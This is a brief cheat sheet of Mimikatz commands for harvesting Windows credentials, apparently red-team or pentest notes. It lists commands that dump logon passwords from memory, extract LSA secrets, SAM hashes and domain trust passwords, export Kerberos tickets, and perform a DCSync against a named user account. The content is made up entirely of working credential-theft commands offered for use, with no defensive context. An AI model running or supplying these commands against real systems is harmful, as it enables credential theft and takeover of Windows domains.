Mimikatz privilege::debug sekurlsa::logonpasswords lsadump::lsa /patch lsadump::sam kerberos::list /export Dumping trust passwords: mimikatz.exe “privilege::debug” “lsadump::trust /patch” exit DC Sync lsadump::dcsync /user:xyz\D2cy